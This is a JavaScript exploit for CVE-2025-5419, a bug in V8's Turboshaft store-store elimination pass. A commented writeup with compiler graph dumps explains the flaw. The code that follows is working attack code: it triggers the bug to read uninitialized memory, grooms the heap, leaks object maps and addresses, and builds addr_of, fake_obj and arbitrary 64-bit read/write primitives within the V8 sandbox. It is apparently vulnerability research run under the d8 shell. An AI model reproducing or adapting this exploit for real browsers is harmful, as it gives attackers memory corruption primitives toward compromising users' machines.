//Exploit for CVE-2025-5419
//author: mistymntncop
//
//Based on the ITW exploit (author unknown) found by Clement Lecigne and Benoît Sevens.
//
// Build d8 using:
// a) Run once
//    git checkout 5c198837c21b9b6cde113c4cb35d00e6b368f9a5
//    gclient sync
//    gn gen ./out/x64.debug
//    gn gen ./out/x64.release
// b) 
//    Debug Build:
//    You will need to patch the "ShouldZapGarbage" function in "./heap/zapping.h"
//    to return false. This function returns false in release builds.
//
//    ninja -C ./out/x64.debug d8
//      
//    Release Build:
//    ninja -C ./out/x64.release d8
//    
//Run with:
//  C:\path\to\v8\v8\out\x64.debug\d8 --allow-natives-syntax exploit.js
//  C:\path\to\v8\v8\out\x64.release\d8 --allow-natives-syntax exploit.js
//
//  C:\path\to\v8\v8\out\x64.debug\d8 --allow-natives-syntax --trace-turbo-graph --trace-turbo exploit.js
//
//
//Writeup
//=================
//https://github.com/v8/v8/blob/7bc0a67ebfbf44e7adab47fc2bbbe308660e27f4/src/compiler/turboshaft/store-store-elimination-reducer-inl.h#L21
//
// StoreStoreEliminationReducer tries to identify and remove redundant
// stores. E.g. for an input like
//
//   let o = {};
//   o.x = 2;
//   o.y = 3;
//   o.x = 4;
//   use(o.x);
//
// we don't need the first store to `o.x` because the value is overwritten
// before it can be observed.
//
//This optimization relies on the compiler correctly modelling the location that loads/stores
//access. 
//
//https://github.com/v8/v8/commit/7bc0a67ebfbf44e7adab47fc2bbbe308660e27f4
//
//       case Opcode::kLoad: {
//         const LoadOp& load = op.Cast<LoadOp>();
//         // TODO(nicohartmann@): Use the new effect flags to distinguish heap
//         // access once available.
//         const bool is_on_heap_load = load.kind.tagged_base;
//+        const bool is_fixed_offset_load = !load.index().valid();
//         // For now we consider only loads of fields of objects on the heap.
//+        if (is_on_heap_load) {
//+          if (is_fixed_offset_load) {
//+            table_.MarkPotentiallyAliasingStoresAsObservable(load.base(),
//+                                                             load.offset);
//+          } else {
//+            // A dynamically indexed load might alias any fixed offset.
//+            table_.MarkAllStoresAsObservable();
//+          }
//         }
//         break;
//       }
//
//Looking at the patch we see that load operations now call "MaybeRedundantStoresTable::MarkAllStoresAsObservable"
//in the case of an indexed load. An indexed load corresponds to something like "arr[index]" in JS. Previously,
//in the unpatched version, this meant that indexed loads were invisible to the store store reducer,
//even though they could potentially alias with previous stores. It is trivial to see that
//"arr[0] = 1" and "arr[index]" would alias when index = 0.
//
//let index = 0;
//let arr = [];
//arr[0] = 1;
//let x = arr[index];
//arr[0] = 2;
//
//Because the "arr[index]" load was unobservable, the compiler erroneously thinks that the "arr[0] = 1" store is
//redundant and is free to remove it. This gives the attacker the primitive to erroneously remove store operations.
//To exploit this primitive we need to remove the initializing stores of an array, that is, the first stores
//to an array that populate the array's elements. By removing these stores, the memory accessed by our indexed load
//will not have been initialized. By reading uninitialized memory we can create further infoleak and fake-object
//primitives which will allow us to escalate to full primitives within the V8 sandbox.
//
//We can use the D8 flags "--trace-turbo-graph --trace-turbo" to see the compilation graph generated by Turboshaft.
//  C:\path\to\v8\v8\out\x64.debug\d8 --allow-natives-syntax --trace-turbo-graph --trace-turbo exploit.js
//
//We will only be looking at the graph for the "vuln_fake_obj" function as it is simpler.
//We are interested in the "V8.TFTurboshaftStoreStoreElimination" and "V8.TFTurboshaftLoopUnrolling" (this reducer 
//occurs before the store store reducer) reducer phases.
//
//Instruction #38 "Allocate(#31)" allocates the FixedArray of array "o = [0x11111111, 0x22222222, obj];".
//Instruction #39 "Store *(#38) = #32" stores the FixedArray's map.
//Instructions #41 "Constant()[smi: 3]" and #42 "Store *(#38 + 4) = #41" set the length of the FixedArray.
//Instructions 
//    #43 "Store *(#38 + 8) = #33", 
//    #45 "Store *(#38 + 12) = #35", 
//    #46 "Store *(#38 + 16) = #34"
//are the initializing stores for FixedArray. These correspond to setting the values 0x11111111, 0x22222222, obj.
//
//We wish to remove the instruction #43, the first store (0x11111111). 
//
//Instruction #55 "Load *(#38 + 8 + #54*4)" is the indexed load corresponding to "result = o[key]". 
//Instruction #59 "Store *(#38 + 8) = #58" is the final store "o[0] = 123" which is needed to make
//the instruction #43 "Store *(#38 + 8) = #33" seem redundant.
//
//As an aside, importantly we must move the #30 "DeoptimizeIf" instruction (which corresponds to the array bounds check)
//to be before #38 "Allocate(#31)". This instruction would interrupt our plans as when the store store reducer 
//encounters a "DeoptimizeIf" it marks all previous stores as observable. We can achieve this easily by performing 
//a bounds check on an array of the same size beforehand.
//
//Another detail worth mentioning is that we can't materialize the actual JSArray corresponding to the object "o".
//This would result in another "Allocate" instruction being emitted before the initializing stores #43, #45, #46.
//When the store store reducer encounters an Allocate instruction it would also mark all previous stores as observable.
//We can easily not materialize this object by not returning it. The "V8.TFEscapeAnalysis" reducer phase will see
//that this object is not returned and will remove the allocation of the JSArray itself leaving only the FixedArray
//elements. 
//
//----- V8.TFTurboshaftLoopUnrolling -----
//
//MERGE B0
//    0: Parameter()[5, %context]
//    1: Parameter()[0, %this]
//    3: Parameter()[1]
//    4: Constant()[heap object: 0x040500065031 <JSFunction vuln_fake_obj (sfi = 0000040500064AF1)>]
//    5: FrameState(#4, #1, #3, #0)[not inlined, UNOPTIMIZED_FRAME, -1, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . .]
//    7: Constant()[heap object: 0x04050004b5cd <NativeContext[303]>]
//    8: JSStackCheck(#7, #5)[function-entry]
//    9: FrameState(#4, #1, #3, #0, #3)[not inlined, UNOPTIMIZED_FRAME, 2, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . #3(kRepTagged|kTypeAny)]
//   12: Constant()[word64: 6]
//   13: Constant()[heap object: 0x040500065841 <FixedArray[3]>]
//   14: Constant()[heap object: 0x0405000007bd <FixedArray[0]>]
//   15: Constant()[heap object: 0x0405000534bd <Map[16](PACKED_SMI_ELEMENTS)>]
//   16: Constant()[word32: 1]
//   17: WordBinop(#3, #16)[BitwiseAnd, Word32]
//   18: Constant()[word32: 0]
//   19: Comparison(#17, #18)[Equal, Word32]
//   20: DeoptimizeIf(#17, #9)[NotASmi, FeedbackSource(INVALID)]
//   21: TaggedBitcast(#3)[Tagged, Word32, Smi]
//   22: Shift(#21, #16)[ShiftRightArithmeticShiftOutZeros, Word32]
//   23: FrameState(#4, #1, #22, #0, #15, #14, #13, #12, #22)[not inlined, UNOPTIMIZED_FRAME, 14, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #22(kRepWord32|kTypeInt32) #0(kRepTagged|kTypeAny) $0(field count: 4) #15(kRepTagged|kTypeAny) #14(kRepTagged|kTypeAny) #13(kRepTagged|kTypeAny) #12(kRepTagged|kTypeAny) . . . #22(kRepWord32|kTypeInt32)]
//   27: Constant()[word32: 3]
//   28: Constant()[word32: 6]
//   29: Comparison(#22, #27)[UnsignedLessThan, Word32]
//   30: DeoptimizeIf(#29, #23)[negated, OutOfBounds, FeedbackSource(INVALID)]
//   31: Constant()[word64: 20]
//   32: Constant()[heap object: 0x0405000005dd <Map(FIXED_ARRAY_TYPE)>]
//   33: Constant()[word64: 572662306]
//   34: Constant()[word64: 0]
//   35: Constant()[word64: 1145324612]
//   36: Constant()[word64: 1]
//   37: Constant()[word64: 2]
//   38: Allocate(#31)[Young, tagged aligned]
//   39: Store *(#38) = #32 [tagged base, TaggedPointer, NoWriteBarrier, initializing]
//   41: Constant()[smi: 3]
//   42: Store *(#38 + 4) = #41 [tagged base, TaggedSigned, NoWriteBarrier, offset: 4, initializing]
//   43: Store *(#38 + 8) = #33 [tagged base, AnyTagged, NoWriteBarrier, offset: 8, initializing]
//   45: Store *(#38 + 12) = #35 [tagged base, AnyTagged, NoWriteBarrier, offset: 12, initializing]
//   46: Store *(#38 + 16) = #34 [tagged base, AnyTagged, NoWriteBarrier, offset: 16, initializing]
//   48: Constant()[heap object: 0x040500053e61 <Map[16](PACKED_ELEMENTS)>]
//   49: Constant()[heap object: 0x04050006e625 <Object map = 000004050004C30D>]
//   50: Constant()[word64: 4]
//   51: Constant()[word32: 2]
//   52: Goto()[B1, 0]
//
//MERGE B1 <- B0
//   53: Store *(#38 + 16) = #49 [tagged base, AnyTagged, PointerWriteBarrier, offset: 16]
//   54: Change(#22)[ZeroExtend, NoAssumption, Word32, Word64]
//   55: Load *(#38 + 8 + #54*4) [tagged base, AnyTagged, Tagged, element size: 2^2, offset: 8]
//   57: Goto()[B2, 0]
//
//MERGE B2 <- B1
//   58: Constant()[word64: 246]
//   59: Store *(#38 + 8) = #58 [tagged base, AnyTagged, NoWriteBarrier, offset: 8]
//   60: Return(#18, #55)[0]
//
//After the "V8.TFTurboshaftStoreStoreElimination" reducer phase we see that the instruction 
//#43 "Store *(#38 + 8) = #33" has been removed. This allows the instruction #45 "Load *(#35 + 8 + #44*4)"
//to access uninitialized memory.
//
//----- V8.TFTurboshaftStoreStoreElimination -----
//
//MERGE B0
//    0: Parameter()[5, %context]
//    1: Parameter()[0, %this]
//    3: Parameter()[1]
//    4: Constant()[heap object: 0x040500065031 <JSFunction vuln_fake_obj (sfi = 0000040500064AF1)>]
//    5: FrameState(#4, #1, #3, #0)[not inlined, UNOPTIMIZED_FRAME, -1, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . .]
//    7: Constant()[heap object: 0x04050004b5cd <NativeContext[303]>]
//    8: JSStackCheck(#7, #5)[function-entry]
//    9: FrameState(#4, #1, #3, #0, #3)[not inlined, UNOPTIMIZED_FRAME, 2, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #3(kRepTagged|kTypeAny) #0(kRepTagged|kTypeAny) . . . . #3(kRepTagged|kTypeAny)]
//   12: Constant()[word64: 6]
//   13: Constant()[heap object: 0x040500065841 <FixedArray[3]>]
//   14: Constant()[heap object: 0x0405000007bd <FixedArray[0]>]
//   15: Constant()[heap object: 0x0405000534bd <Map[16](PACKED_SMI_ELEMENTS)>]
//   16: Constant()[word32: 1]
//   17: WordBinop(#3, #16)[BitwiseAnd, Word32]
//   18: Constant()[word32: 0]
//   19: DeoptimizeIf(#17, #9)[NotASmi, FeedbackSource(INVALID)]
//   20: TaggedBitcast(#3)[Tagged, Word32, Smi]
//   21: Shift(#20, #16)[ShiftRightArithmeticShiftOutZeros, Word32]
//   22: FrameState(#4, #1, #21, #0, #15, #14, #13, #12, #21)[not inlined, UNOPTIMIZED_FRAME, 14, Ignore, 0x040500064af1 <SharedFunctionInfo vuln_fake_obj>, state values: #4(kRepTagged|kTypeAny) #1(kRepTagged|kTypeAny) #21(kRepWord32|kTypeInt32) #0(kRepTagged|kTypeAny) $0(field count: 4) #15(kRepTagged|kTypeAny) #14(kRepTagged|kTypeAny) #13(kRepTagged|kTypeAny) #12(kRepTagged|kTypeAny) . . . #21(kRepWord32|kTypeInt32)]
//   26: Constant()[word32: 3]
//   27: Constant()[word32: 6]
//   28: Comparison(#21, #26)[UnsignedLessThan, Word32]
//   29: DeoptimizeIf(#28, #22)[negated, OutOfBounds, FeedbackSource(INVALID)]
//   30: Constant()[word64: 20]
//   31: Constant()[heap object: 0x0405000005dd <Map(FIXED_ARRAY_TYPE)>]
//   32: Constant()[word64: 572662306]
//   33: Constant()[word64: 0]
//   34: Constant()[word64: 1145324612]
//   35: Allocate(#30)[Young, tagged aligned]
//   36: Store *(#35) = #31 [tagged base, TaggedPointer, NoWriteBarrier, initializing]
//   38: Constant()[smi: 3]
//   39: Store *(#35 + 4) = #38 [tagged base, TaggedSigned, NoWriteBarrier, offset: 4, initializing]
//   40: Store *(#35 + 12) = #34 [tagged base, AnyTagged, NoWriteBarrier, offset: 12, initializing]
//   42: Constant()[heap object: 0x04050006e625 <Object map = 000004050004C30D>]
//   43: Store *(#35 + 16) = #42 [tagged base, AnyTagged, PointerWriteBarrier, offset: 16]
//   44: Change(#21)[ZeroExtend, NoAssumption, Word32, Word64]
//   45: Load *(#35 + 8 + #44*4) [tagged base, AnyTagged, Tagged, element size: 2^2, offset: 8]
//   47: Constant()[word64: 246]
//   48: Store *(#35 + 8) = #47 [tagged base, AnyTagged, NoWriteBarrier, offset: 8]
//   49: Return(#18, #45)[0]
//
//Extra Reading
//=======================
//https://v8.dev/blog/trash-talk
//https://jayconrod.com/posts/55/a-tour-of-v8-garbage-collection

function gc_minor() { //scavenge
    // Force a young-generation GC (scavenge) by allocating a burst of
    // short-lived heap objects.
    const junk = new Array(0x10000);
    let i = 0;
    while (i < junk.length) {
        junk[i] = new String("");
        i++;
    }
}

// Force a full mark-sweep GC: allocating a ~2GB ArrayBuffer creates enough
// old-space pressure that V8 runs a major collection. The buffer itself is
// unreferenced and dropped immediately.
function gc_major() { //mark-sweep
    new ArrayBuffer(0x7fe00000);
}

function smi(i) {
    // Encode a BigInt as a V8 Smi: the value lives in the upper 31 bits,
    // so doubling it (== shifting left by one) leaves the tag bit clear.
    return i * 2n;
}

// Shared 8-byte scratch buffer with three typed views over the same bits,
// used by dtoi/itod to reinterpret a float64 as an int64 and back.
var conv_ab = new ArrayBuffer(8);
var conv_f64 = new Float64Array(conv_ab);
var conv_b64 = new BigInt64Array(conv_ab);
var conv_u32 = new Uint32Array(conv_ab);

function dtoi(f) {
    // Type-pun: return the raw 64-bit pattern of a double as a BigInt.
    conv_f64[0] = f;
    const bits = conv_b64[0];
    return bits;
}

function itod(i) {
    // Type-pun: reinterpret a 64-bit BigInt pattern as a double.
    conv_b64[0] = i;
    const f = conv_f64[0];
    return f;
}
// Byte sizes of the object headers that precede element data
// (compressed-pointer heap; values are used for address arithmetic below).
const JS_ARRAY_HEADER_SIZE = 16n;
const FIXED_ARRAY_HEADER_SIZE = 8n;
//allocate this upfront and not in vuln_fake_obj
const obj = {};

// Double array whose elements store we corrupt to overlay the fake JSArray.
var large_arr = null;

// Leaked compressed heap words, filled in by install_primitives().
var packed_dbl_arr_map = null;
var packed_arr_map = null;
var empty_fixed_arr = null;
var large_arr_elements_addr = null;
var fixed_arr_map = null;
var fixed_dbl_arr_map = null;

// The fake JSArray materialized inside large_arr's elements, plus its
// (compressed) address and the address used as its elements pointer.
var fake_arr = null;
var fake_arr_addr = null;
var fake_arr_elements_addr = null;

// fake_obj: given a (compressed) heap address, return a JS reference to
// whatever lives there. Rewrites the fake JSArray overlaid on large_arr so
// it is a 1-element object array whose single element slot is large_arr[3],
// writes the tagged address into that slot, then reads it out as an object.
function fake_obj(addr) {
    // Slot 0: fake array's map (packed elements) + properties word.
    large_arr[0] = itod(packed_arr_map | (empty_fixed_arr << 32n));
    // Slot 1: fake array's elements pointer + Smi length 1.
    large_arr[1] = itod(fake_arr_elements_addr | (smi(1n) << 32n));

    // Element slot: tagged (| 1n) pointer to the target address.
    large_arr[3] = itod(addr | 1n);
    
    let result = fake_arr[0];
    
    // Clear the slot so no stale fake pointer is left for the GC to scan.
    large_arr[3] = itod(0n);
    
    return result;
}

// addr_of: return the compressed heap address of a JS object.
// Inverse of fake_obj: store the object through fake_arr[0] (which places
// its tagged pointer into large_arr slot 3), then read the raw bits back
// through the double array.
function addr_of(obj) {
    large_arr[0] = itod(packed_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod(fake_arr_elements_addr | (smi(1n) << 32n));

    fake_arr[0] = obj;
    // Low 32 bits of the element slot are the compressed tagged pointer.
    let result = dtoi(large_arr[3]) & 0xFFFFFFFFn;
    
    large_arr[3] = itod(0n);
    
    return result;
}

// v8_read64: read 8 bytes at an arbitrary (compressed) heap address.
// Retypes the fake array as a double array and aims its elements pointer at
// (addr - FIXED_ARRAY_HEADER_SIZE) so element 0 overlaps addr exactly.
function v8_read64(addr) {
    // Compensate for the FixedArray header implied by the elements pointer.
    addr -= FIXED_ARRAY_HEADER_SIZE;
    
    large_arr[0] = itod(packed_dbl_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod((addr | 1n) | (smi(1n) << 32n));
    
    let result = dtoi(fake_arr[0]);
    
    // Restore a harmless elements pointer and zero length.
    large_arr[1] = itod(empty_fixed_arr | (smi(0n) << 32n)); 

    return result;    
}

// v8_write64: write 8 bytes to an arbitrary (compressed) heap address,
// using the same retyped-double-array trick as v8_read64.
function v8_write64(addr, val) {
    // Compensate for the FixedArray header implied by the elements pointer.
    addr -= FIXED_ARRAY_HEADER_SIZE;
    
    large_arr[0] = itod(packed_dbl_arr_map | (empty_fixed_arr << 32n));
    large_arr[1] = itod((addr | 1n) | (smi(1n) << 32n));
    
    fake_arr[0] = itod(val);
    
    // Restore a harmless elements pointer and zero length.
    large_arr[1] = itod(empty_fixed_arr | (smi(0n) << 32n));   
}


// vuln_leak: CVE-2025-5419 trigger #1 — returns 8 doubles read from
// UNINITIALIZED FixedArray memory. The store-store reducer wrongly deletes
// the initializing stores of the second array because the indexed loads
// o[key+i] are invisible to it and the trailing fixed-offset stores make
// the initializers look redundant. Code shape is load-bearing: do not edit.
function vuln_leak(key) {
    //Force key to be a smi
    key |= 0;
    
    //Force OOB check here: hoists the bounds-check DeoptimizeIf before the
    //Allocate so it cannot mark the later stores as observable.
    //This allocation doesn't get materialized
    let o = [1,2,3,4,5,6,7,8];
    let result1 = o[key];
    let result2 = o[key+1];
    let result3 = o[key+2];
    let result4 = o[key+3];
    let result5 = o[key+4];
    let result6 = o[key+5];
    let result7 = o[key+6];
    let result8 = o[key+7];
    
    //Escape analysis doesn't materialize the actual object, only the
    //object's elements FixedArray
    //PACKED_DOUBLE_ELEMENTS
    o = [1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1];
    
    //Indexed loads: invisible to the store store reducer (the bug)
    result1 = o[key];
    result2 = o[key+1];
    result3 = o[key+2];
    result4 = o[key+3];
    result5 = o[key+4];
    result6 = o[key+5];
    result7 = o[key+6];
    result8 = o[key+7];    
    
    //We need these writes so the initializing stores above become
    //unobservable and are eliminated
    o[0] = 123;
    o[1] = 123;
    o[2] = 123;
    o[3] = 123;
    o[4] = 123;
    o[5] = 123;
    o[6] = 123;
    o[7] = 123;

    return [result1, result2, result3, result4, result5, result6, result7, result8];
}

// vuln_fake_obj: CVE-2025-5419 trigger #2 — reads one uninitialized
// FixedArray slot. After the heap is groomed so that slot holds a pointer
// to the fake array, this returns the fake JSArray as a live object.
// Code shape is load-bearing (see graph dump in the header): do not edit.
function vuln_fake_obj(key) {
    //Force key to be a smi
    key |= 0;
    
    //Force OOB check here: hoists the bounds-check DeoptimizeIf before the
    //Allocate so it cannot mark the later stores as observable.
    //This allocation doesn't get materialized
    let o = [1,2,3];
    let result = o[key];
    
    //Escape analysis doesn't materialize the actual object, only the
    //object's elements FixedArray
    //PACKED_ELEMENTS
    o = [0x11111111, 0x22222222, obj];
    
    //Indexed load: invisible to the store store reducer (the bug)
    result = o[key];
    
    //We need this write so the initializing store of o[0] becomes
    //unobservable and is eliminated
    o[0] = 123;

    return result;
}
 
// install_primitives: JIT-compiles both vuln functions, grooms the heap
// into a predictable layout, leaks maps/addresses via vuln_leak, builds a
// fake JSArray inside large_arr's elements, and materializes it with
// vuln_fake_obj. Populates the global primitives used by fake_obj/addr_of/
// v8_read64/v8_write64.
function install_primitives() {
    //TODO: need proper JIT guarantee function...
    //For now we will just use the native syntax functions
    //to force JIT...
    %PrepareFunctionForOptimization(vuln_leak);
    vuln_leak(0);
    %OptimizeFunctionOnNextCall(vuln_leak);
        
    %PrepareFunctionForOptimization(vuln_fake_obj);
    vuln_fake_obj(0);
    %OptimizeFunctionOnNextCall(vuln_fake_obj);
    
    //Preallocate all the base objects so that
    //we don't have to worry about extra objects
    //from object transitions also being allocated, etc.
    //We will clone these base objects later.
    let base_block = new Array(22 - (Number(JS_ARRAY_HEADER_SIZE + FIXED_ARRAY_HEADER_SIZE)/4));
    base_block.fill(123);
    for(let i = 0; i < base_block.length; i++) {
        base_block[i] = i;
    }
    
    let float_block = new Array(0x1000);
    float_block.fill(1.1);
        
    let large_base = new Array(0x10000);
    large_base.fill(1.1);
    
    //Settle the heap before cloning so the clones land adjacently.
    gc_minor();
    gc_major();

    let filler_block = Array.from(base_block);
    large_arr = Array.from(large_base);
    let packed_arr_obj = [large_arr, 0x11223344];
    let packed_dbl_arr_obj = [1.1];
         
/*
    %DebugPrint(filler_block);
    %DebugPrint(large_arr);
    %DebugPrint(packed_arr_obj);
    %DebugPrint(packed_dbl_arr_obj);
    //%SystemBreak();
//*/   
    //we need to remove references to packed_arr_obj, packed_dbl_arr_obj so that they
    //don't get moved. This would replace their maps with forwarding addresses which
    //we do not want...
    packed_arr_obj = null;
    packed_dbl_arr_obj = null;
    
    gc_minor();
    gc_major();

    //trigger vuln to leak addresses: each leaked double holds two 32-bit
    //heap words from the groomed objects above
    let leaks = vuln_leak(0);
    packed_arr_map = (dtoi(leaks[3]) >> 32n) & 0xFFFFFFFFn;
    packed_dbl_arr_map = (dtoi(leaks[7]) >> 32n) & 0xFFFFFFFFn;
    large_arr_elements_addr = (dtoi(leaks[0]) >> 32n) & 0xFFFFFFFFn;
    empty_fixed_arr = (dtoi(leaks[0])) & 0xFFFFFFFFn;
    fixed_arr_map = (dtoi(leaks[1]) >> 32n) & 0xFFFFFFFFn;
    fixed_dbl_arr_map = (dtoi(leaks[5]) >> 32n) & 0xFFFFFFFFn;
    
    //Place the fake JSArray inside large_arr's elements store.
    fake_arr_addr = large_arr_elements_addr + FIXED_ARRAY_HEADER_SIZE;
    fake_arr_elements_addr = fake_arr_addr + 16n;
    
    //NOTE(review): `empty_fixed_arr >> 32n` differs from the `<< 32n` used
    //in fake_obj/addr_of, so the upper (properties) word here is 0 —
    //confirm this is intended.
    large_arr[0] = itod(packed_dbl_arr_map | (empty_fixed_arr >> 32n));
    large_arr[1] = itod(fake_arr_elements_addr | (smi(0n) << 32n));
    large_arr[2] = itod(fixed_arr_map | (smi(1n) << 32n));
    
    //Spray copies of fake_arr_addr so the uninitialized slot read by
    //vuln_fake_obj holds a pointer to our fake array.
    let float_filler = Array.from(float_block);
    float_filler.fill(itod(fake_arr_addr | (fake_arr_addr << 32n)));
    
//*
    for(let i = 0; i < leaks.length; i++) {
        let val = dtoi(leaks[i]);
        let a = (val >> 32n) & 0xFFFFFFFFn;
        let b = val & 0xFFFFFFFFn;
        console.log(a.toString(16).padStart(8, "0") + b.toString(16).padStart(8, "0"));
    }
    
    console.log("packed_arr_map = " + packed_arr_map.toString(16));
    console.log("packed_dbl_arr_map = " + packed_dbl_arr_map.toString(16));
    console.log("large_arr_elements_addr = " + large_arr_elements_addr.toString(16));
    console.log("empty_fixed_arr = " + empty_fixed_arr.toString(16));
    console.log("fixed_arr_map = " + fixed_arr_map.toString(16));
    console.log("fixed_dbl_arr_map = " + fixed_dbl_arr_map.toString(16));

    %DebugPrint(leaks);
//*/

    float_filler = null;

    gc_minor();
    gc_major();
    
    let block3 = new Array(0x200);
    block3.fill(0x1111);
    
    //trigger vuln again to materialize fake object
    fake_arr = vuln_fake_obj(0);
}
// test: entry point. Installs the exploit primitives, then sanity-checks
// them: addr_of on the fake array, a read/write round-trip at its address,
// and fake_obj to re-materialize it from the raw address.
function test() {
    install_primitives();

    let fake_arr_addr2 = addr_of(fake_arr);
    console.log("fake_arr_addr2 = " + fake_arr_addr2.toString(16));
    
    // Round-trip: read 8 bytes at the fake array, write the same value back.
    let x = v8_read64(fake_arr_addr2);
    console.log("x = " + x.toString(16));
    v8_write64(fake_arr_addr2, x);
    
    %DebugPrint(fake_arr);
    
    // Materialize a second reference to the fake array from its address.
    let fake_arr_test = fake_obj(fake_arr_addr2);
    //%DebugPrint(fake_arr_test);
}
test();